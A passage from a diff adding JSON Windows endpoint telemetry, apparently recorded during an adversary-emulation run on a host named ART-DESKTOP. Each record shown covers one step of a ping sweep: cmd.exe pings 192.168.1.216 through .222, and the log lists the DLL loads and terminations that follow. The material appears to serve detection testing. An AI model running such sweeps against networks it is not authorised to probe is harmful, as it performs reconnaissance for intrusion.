"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "process", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573046830000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.216", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1144, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": 
"{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573046980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "event_type": "process", + "pid": 1144, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573051830000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.217", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6556, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573051980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "event_type": "process", + "pid": 6556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.218", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3944, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573056970000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573056980000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "event_type": "process", + "pid": 3944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573061830000, + "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.219", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4184, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573061980000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "event_type": "process", + "pid": 4184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573066990000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.220", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883573067130000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067140000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573067300000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573071830000, + "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.221", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6080, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573071980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "event_type": "process", + 
"pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573076840000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.222", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573076980000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + 
